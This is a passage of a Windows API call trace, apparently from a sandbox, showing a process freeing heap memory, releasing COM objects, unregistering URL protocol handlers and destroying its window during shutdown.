hHeap=0x410000, dwFlags=0x0, lpMem=0x47d068 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfa0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47aa68 | out: hHeap=0x410000) returned 1 [0077.180] IUnknown:Release (This=0x461810) returned 0x0 [0077.180] IUnknown:Release (This=0x443704) returned 0x0 [0077.180] IUnknown:Release (This=0x750296bc) returned 0x7fff [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42da70 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fab8 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.181] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.182] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.183] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44cc58 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44cb58 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c808 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4294a0 | out: hHeap=0x410000) returned 1 [0077.186] IUnknown:Release (This=0x43f360) returned 0x0 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4248a0 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44a610 | out: hHeap=0x410000) returned 1 [0077.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444960 | out: hHeap=0x410000) returned 1 [0077.186] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x76e40000 [0077.186] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0077.186] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.186] IInternetSession:UnregisterNameSpace (This=0x43f548, pCF=0x75028c50, pszProtocol="res") returned 0x0 [0077.187] IUnknown:Release (This=0x75028c50) returned 0x1 [0077.187] IInternetSession:UnregisterNameSpace (This=0x43f548, pCF=0x75028c70, pszProtocol="about") returned 0x0 [0077.187] IUnknown:Release (This=0x75028c70) returned 0x1 [0077.187] IUnknown:Release (This=0x43f548) returned 0x1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4336d8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451830 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4242a8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa28 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4518a8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d1e0 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424888 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f3c0 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4513a8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4248b8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424a98 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f060 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa40 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x446dc8 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f998 | out: hHeap=0x410000) returned 1 [0077.187] IUnknown:Release (This=0x446e80) returned 0x0 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x442f00 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f860 | out: hHeap=0x410000) returned 1 [0077.187] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3c8 | out: hHeap=0x410000) returned 1 [0077.187] DeleteDC (hdc=0x100109d1) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4442f0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444288 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429270 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444620 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444360 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4292c0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x459d10 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429220 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429310 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429360 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429400 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429450 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.188] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444818 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444780 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444718 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4443c8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4293b0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44e610 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44e5b8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ddb0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44d5a8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44d518 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43ba20 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472258 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4334b8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43abd0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4291d0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f2a8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f2f0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x476e48 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ccb8 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f338 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f830 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.189] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f848 | out: hHeap=0x410000) returned 1 [0077.189] GetCurrentThreadId () returned 0x90 [0077.189] DestroyWindow (hWnd=0x202ae) returned 1 [0077.189] NtdllDefWindowProc_W () returned 0x0 [0077.278] NtdllDefWindowProc_W () returned 0x0 [0077.278] NtdllDefWindowProc_W () returned 0x0 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f2d8 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d808 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.278] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.279] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f920 | 